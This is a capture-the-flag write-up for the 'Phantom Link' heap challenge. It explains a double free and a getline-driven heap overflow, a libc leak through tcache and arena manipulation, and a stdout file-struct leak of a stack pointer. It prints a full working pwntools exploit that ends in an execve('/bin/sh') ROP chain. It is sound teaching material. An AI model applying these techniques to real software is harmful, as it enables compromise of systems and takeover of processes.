Introduction

This past week I participated in the Season IV US Cyber open, and solved all PWN challenges. All of them were fun, and it was interesting how they built on top of each other. In particular, I will be covering the ‘final’ PWN challenge, Phantom Link. I contains some really interesting heap exploitation, including a interesting way of leaking libc. I will cover my exploit, as well as how I delveloped it and some of the pitfalls I ran into along the way.

I will not be covering the heap allocator in specifics during this writeup. Lots of people smarter than me have written about it in the past, I recommend reading the How2Heap website as well as malloc internals for specifics

The Bug(s)

There are two bugs in the program that enable full control over the heap and allocator.

  • Double free (pointers are not cleared after free, only size)
  • Heap overflow (getline called with large size)

Double Free

In heap exploitation, a double free is when you can free an object from that stack more than once. This normally occurs when a pointer is left somewhere in static memory. While one it’s own it can be difficult to exploit, it is a powerful primitive for allocating arbitrary chunks on the heap. For an example of how this can be abused check out How to Heap fastbin_dup). In the case of this challenge, there is a limited amount of times we can call malloc, so this particular attack is not useful. To trigger the double free, simply call create and then remove twice on the index created.

double free

Heap overflow

Like a buffer overflow, a heap overflow is a powerful primitive in exploitation. It allows the attacker to overwrite metadata of another in use chunk. This is very important for manipulating the allocator into allocating an address you want. In this challenge, it can be triggered by editing any allocated index. The cause of this is getline is called with an int* as an argument, instead of a size_t*. The type mismatch in this case is important, as the four bytes above the int in memory are accepted into the getline call, which enables large writes without realloc being called.

Debugging

Trigger bug

Please enter your choice: 3
Index 0: AAAA

Index 1: BBBB

Please enter your choice: 2
Enter index of data to remove: 0
Data removed successfully.

Please enter your choice: 1
Enter size: 10
Enter data: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Data added successfully to index: 0.

Please enter your choice: 3
Index 0: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Index 1: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

or with code

add("AAAA", 10)
add("BBBB", 10)
print_items()
remove(0)
add("C"*0xA0, 10)
print_items()

Attack overview

To attack this program, I will use the bugs in conjunction to allocate memory at a controlled address. I will then proceed to leak a Libc pointer by freeing a chunk into an unsorted bin, and using that address to allocate a chunk over the _IO_2_1_stdout file struct, and use FOP to leak a pointer to the environ ptr from libc. Finally, I will end in ROP.

Some constraints of this program are that it has a 1/16 success rate, as you will see shortly

Steps:

  • Leak Heap address
  • Leak libc
  • overwrite _IO_2_1_stdout to leak stack
  • ROP
  • profit

Exploration

Before exploiting a program, I like to explore its capabilities. I usually do some handfuzzing and explore the critical area’s of the binary in GDB. This helps me build an intuition for what I can do, and what I can’t.

For example, in this program I noticed early on that malloc was not being called that much (only 10 times). At first I didn’t know why, I assumed getline would call malloc under the hood to handle arbitrarily large requests. I then went and read the getline source code on elixer.bootlin and discovered that if getline is called with a non-NULL ptr and non-zero size, malloc is skipped. realloc is also not called, as the size is too large to ever reach the realloc limit. This is critical to exploitation, as I know I have a limited amount of called to malloc and will have to worry about how many new chunks I allocate as I build my exploit.

Exploring malloc

Another thing I noticed is that while getline is nice for overflow, it will write a NULL byte after the string has been written to memory. This makes reading past the data written impossible. Once again, this will play an important role in exploitation, as it limits how I can leak objects.

Null byte

All this is to say, spend some time figuring out how things work, and know your allocator!

Finally, I confirm my assumptions by reviewing the source code relevant to the challenge

getline source

I’ve trimmed down __get_delim to only include what is important to the challenge, you can read the full source here


getline (char **__lineptr, size_t *__n, FILE *__stream)
{
  return __getdelim (__lineptr, __n, '\n', __stream);
}

ssize_t
__getdelim (char **lineptr, size_t *n, int delimiter, FILE *fp)
{
  ssize_t result;
  ssize_t cur_len = 0;
  ssize_t len;

...

  if (*lineptr == NULL || *n == 0)
    {
      *n = 120;
      *lineptr = (char *) malloc (*n);
      if (*lineptr == NULL)
	{
	  fseterr_unlocked (fp);
	  result = -1;
	  goto unlock_return;
	}
    }

...

  for (;;)
    {
      size_t needed;
      char *t;
...
      needed = cur_len + len + 1;
      if (needed > *n)
	{
	  char *new_lineptr;

	  if (needed < 2 * *n)
	    needed = 2 * *n;  /* Be generous. */
	  new_lineptr = (char *) realloc (*lineptr, needed);
	}
...
(*lineptr)[cur_len] = '\0';
result = cur_len;

unlock_return:
  _IO_release_lock (fp);
  return result;
}

Exploitation

Stage 1

The first goal of most heap exploits is leaking the heap address. This allows you to usually allocate you’re own chunks on the heap, and overwrite other data. To accomplishing this isn’t that hard in this case, as double free makes it possible.

add('50', "AAAAA")
add('50', b"targetll"*0x84+p64(0)+p64(0x361))
delete('0')
add('50', p64(0)*15+p64(0x81))
add('50', 'lol')
delete('1')
delete('0')

freeing and allocating in this manner causes two of the allocations to point to the same address, so I can free one, and read from the other. After that, decrypting the heap pointer is easy. There is a specific way to do it, but I just copy and paste the following function every time I need to do it lol.

def decrypt_ptr(cipher):
    key = 0
    plain = ''

    cipher = cipher
    for i in range(6):
        bits = 64-12*i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12
    return plain, key

#decrypt code
print_data()
ru('2: ')
leak = uu64(r.recv(6))
heap, key = decrypt_ptr(leak)
heap = heap - 0x320
info(f'heap: {hex(heap)}')
info(f'key: {hex(key)}')

Heap Leak

Stage 2

With a heap pointer in hand, the next step is to leak libc. Leaking libc in heap pwn is done by freeing a chunk of size >= 0x430. This causes the chuck to be freed into unsorted bins, and the libc fd and bk pointers are written to the heap. From there it’s as easy as repeating the steps above and calling print, right? Wrong. The fd and bk pointers both have a NULL byte as the LSB, which makes the print function useless. To be honest, this is what too me the most time in the challenge, but once I got it I was very satisfied.

heap+0xC0 is the address of the arena next pointer, this controls where the next chunk of size 0x80 will be allocated *heap+0x320 is the address of chunk 2 Here are the steps:

  1. overflow chunk 2 metadata, setting it’s size to 0x431
  2. free chunk 2 into unsorted bins, resulting in libc pointer being placed of the heap
  3. free chunk 1, to be used to overflow and overwrite chunk 2’s metadata again.
  4. alloc a chunk, and rewrite the size of chunk 2 to be 0x80, used for freeing into the tcache. this will also set the next ptr or chunk 1 to target the arena on the heap
  5. alloc once, this loads target1 into arena next ptr
  6. alloc again, overwriting the arena next ptr with target2
  7. alloc target2, which loads the first 8bytes of target2 into the arena next ptr, where it will be xor’d with the heap key

It’s pretty complicated, but the gist is that in order to leak to pointer, it needs to not have a null byte in it. I force this by allocating a chunk in the arena at the start of the heap, where the pointer to the next free tcache chunk is stored. I then alloc to force the libc pointer into this slot, where it will be xor’d against a heap key, erasing the null byte.

Heap metadata

To help understand what is going on, the following charts how the important sections of the heap metadata are manipulated during each step. New chunks are allocated from heap arena+0xC0.

step.   heap arena+0xC0   chunk 1(next ptr)  chunk 2(next ptr)
      +-----------------+ +----------------+ +----------------+
  1.  |  unknown        | |       0        | |       0        |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  2.  |  unknown        | |       0        | |   libc ptr     |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  3.  |  chunk 1        | |       0        | |   libc ptr     |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  4.  |  chunk 1        | |arena+0xc0 ^ key| |   libc ptr     |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  5.  |  arena+0xc0     | |       0        | |   libc ptr     |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  6.  |  chunk 2        | |       0        | |   libc ptr     |
      +-----------------+ +----------------+ +----------------+
      +-----------------+ +----------------+ +----------------+
  7.  | libc ptr ^ key  | |       0        | |       0        |
      +-----------------+ +----------------+ +----------------+

Code


    ##corrupt unsorted bin to split in half, saves allocation
    payload = p64(0)*15+p64(0x431)
    payload += p64(0)*85+p64(0x361)
    add("2000", payload) #1
    delete('1') #2
    add("40", '') #free to unsorted bins
    delete('0') #3
    
    #rewrite the unsorted bin ptr to be a tcache bin
    target1 = heap+0xC0
    add("40", p64(target1^key)+p64(0)*14+p64(0x81)) #4
    #write the next alloc to point to the heap 
    target2 = heap+0x320
    add("40", '') #5
    add("40", p64(target2)) #6
    add("40", '') #7

    print_data()
    ru('4: ')
    libc_enc = uu64(r.recv(6))
    info(f"libc_pre: {hex(libc_enc)}")
    libc.address = (libc_enc ^ key) - 0x1D700A
    info(f"libc: {hex(libc.address)}")

My recommendation is to step through my exploit code in a debugger, and observe how the heap values change to really undertand what is going on!

Stage 3

Now that libc has been leaked (with a 1/16 chance of being correct), things get a lot easier. There are many different paths you can take here, I will describe the one I use whenever I get the chance.

I use the same primitives for controlled allocations as I described above, so I will not repeat them here. the next two places I alloc to are _IO_2_1stdout and the stack

First, allocate a chunk to the _IO_stdout file struct. You can use the pwntools FileStructure class to generate the payload automatically. Just something like payload = fs.write(libc.symbols[environ]). This will print the environ stack pointer to stdout, where I can read it

stdout overwrite

file = FileStructure(0x13371337)
payload = p64(0xfbad2887)
payload += file.write(libc.symbols["environ"], 8)[8:0x50]
add("200", payload[:0x50])

From there, alloc a chunk on the stack, and send a ROP chain! Ropping is always the way I like to take code flow when I can, as it is simple and consistant in most cases.

ROP

stack = uu64(r.recv(6))

info(f"stack: {hex(stack)}")
delete('0')
delete('1')

target = stack-0xf8
payload = p64(target^key)
payload += b'/bin/sh\x00' 
payload += p64(0)*14 + p64(0x81)
payload += p64(target^key)
##payload += p64(target^key)
##payload += p64(libc.address+fd_offset)
##target = heap+0x3a0
add("4000", payload)
add("40", p64(target^key))
add("40", '')

pop_rax = libc.address + 0x000000000003e5a3#: pop rax; ret;
pop_rdi = libc.address + 0x0000000000026362#: pop rdi; ret
pop_rsi = libc.address + 0x0000000000027b31#: pop rsi; ret;
pop_rdx = libc.address + 0x00000000000c7082#: pop rdx; ret;
syscall = libc.address + 0x0000000000088496#: syscall; ret;

rop_chain = p64(0)
rop_chain += p64(pop_rdx)
rop_chain += p64(0)
rop_chain += p64(pop_rsi)
rop_chain += p64(0)
rop_chain += p64(pop_rdi)
rop_chain += p64(heap+0x2a8)
rop_chain += p64(pop_rax)
rop_chain += p64(0x3b)
rop_chain += p64(syscall)
add("4000", rop_chain)
sl('4')
info("yeet$$$$")
r.interactive()

shell :3

Conclusion

I really enjoyed this challenge, and enjoyed how I had to think about how to misuse the security protection given too heap pointers in order to leak libc. It was a great test of skill, and one of my favorite heap PWN challenges. I hope the writeup has been informative, and feel free to reach out on discord with any further questions.

Full exploit


#!/usr/bin/env python3

from pwn import *

exe = ELF("chall_patched")
libc = ELF("libc.so.6")
ld = ELF("ld-linux-x86-64.so.2")

context.binary = exe
context.terminal = ["tmux", "splitw", "-h"]

def conn():
    if args.LOCAL:
        r = process([exe.path], level='error')
        if args.DEBUG:
            gdb.attach(r)
    else:
        #r = remote("localhost", 9001, level='error')
        r = remote("0.cloud.chals.io", 30126, level='error')

    return r

r = conn()

sa   = lambda a,b : r.sendafter(a,b)
sla  = lambda a,b : r.sendlineafter(a,b)
sd   = lambda a,b : r.send(a,b)
sl   = lambda a : r.sendline(a)
ru   = lambda a : r.recvuntil(a, drop=True)
rc   = lambda : r.recv(4096)
uu32 = lambda data : u32(data.ljust(4, b'\0'))
uu64 = lambda data : u64(data.ljust(8, b'\0'))

def add(sz, data):
    sla("choice: ", '1')
    sla("size: ", sz)
    sla("data: ", data)

def print_data():
    sla("choice: ", '3')

def delete(idx):
    sla("choice: ", '2')
    sla("remove: ", idx)

def decrypt_ptr(cipher):
    key = 0
    plain = ''

    cipher = cipher
    for i in range(6):
        bits = 64-12*i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12
    return plain, key

def setup_vuln():
    add('50', "AAAAA")
    add('50', b"targetll"*0x84+p64(0)+p64(0x361))
    delete('0')
    add('50', p64(0)*15+p64(0x81))
    add('50', 'lol')
    delete('1')
    delete('0')

def main():
    global r
    r.close()
    r = conn()
    fd_offset = 0x1D7D00
    setup_vuln()

    print_data()
    ru('2: ')
    leak = uu64(r.recv(6))
    heap, key = decrypt_ptr(leak)
    heap = heap - 0x320
    info(f'heap: {hex(heap)}')
    info(f'key: {hex(key)}')


    #get pointer to next allocation
    target = heap+0xB0
    payload = p64(target^key)

    ##corrupt unsorted bin to split in half, saves allocation
    payload += p64(0)*14+p64(0x431)
    payload += p64(0)*85+p64(0x361)
    add("2000", payload)
    delete('1')
    add("40", '') #free to unsorted bins
    delete('0')
    
    #rewrite the unsorted bin ptr to be a tcache bin
    target = heap+0xC0
    add("40", p64(target^key)+p64(0)*14+p64(0x81))

    #write the next alloc to point to the heap 
    target = heap+0x320
    add("40", '')
    add("40", p64(target))
    add("40", '')

    print_data()
    ru('4: ')
    libc_enc = uu64(r.recv(6))
    info(f"libc_pre: {hex(libc_enc)}")
    libc.address = (libc_enc ^ key) - 0x1D700A
    info(f"libc: {hex(libc.address)}")

    #if(args.LOCAL):
    #    gdb.attach(r)
    #    libc.address = int(raw_input(), 16)
    #else:
    #    libc.address = int(raw_input(), 16)

    target = libc.address+0x1D87A0
    delete('0')
    delete('1')
    payload = p64(target^key)
    payload += p64(0)*14 + p64(0x81)
    payload += p64(target^key)
    add("4000", payload)
    add("40", payload)
    add("40", '')

    file = FileStructure(0x13371337)
    payload = p64(0xfbad2887)
    payload += file.write(libc.symbols["environ"], 8)[8:0x50]
    try:
        add("200", payload[:0x50])
        #add("200", "AAAAA")
        stack = uu64(r.recv(6))
    except:
        return


    info(f"stack: {hex(stack)}")
    delete('0')
    delete('1')

    target = stack-0xf8
    payload = p64(target^key)
    payload += b'/bin/sh\x00' 
    payload += p64(0)*14 + p64(0x81)
    payload += p64(target^key)
    ##payload += p64(target^key)
    ##payload += p64(libc.address+fd_offset)
    ##target = heap+0x3a0
    add("4000", payload)
    add("40", p64(target^key))
    add("40", '')

    pop_rax = libc.address + 0x000000000003e5a3#: pop rax; ret;
    pop_rdi = libc.address + 0x0000000000026362#: pop rdi; ret
    pop_rsi = libc.address + 0x0000000000027b31#: pop rsi; ret;
    pop_rdx = libc.address + 0x00000000000c7082#: pop rdx; ret;
    syscall = libc.address + 0x0000000000088496#: syscall; ret;

    rop_chain = p64(0)
    rop_chain += p64(pop_rdx)
    rop_chain += p64(0)
    rop_chain += p64(pop_rsi)
    rop_chain += p64(0)
    rop_chain += p64(pop_rdi)
    rop_chain += p64(heap+0x2a8)
    rop_chain += p64(pop_rax)
    rop_chain += p64(0x3b)
    rop_chain += p64(syscall)
    add("4000", rop_chain)
    sl('4')
    ru("Exiting...")
    info("yeet$$$$")

    r.interactive()

if __name__ == "__main__":
    while True:
    main()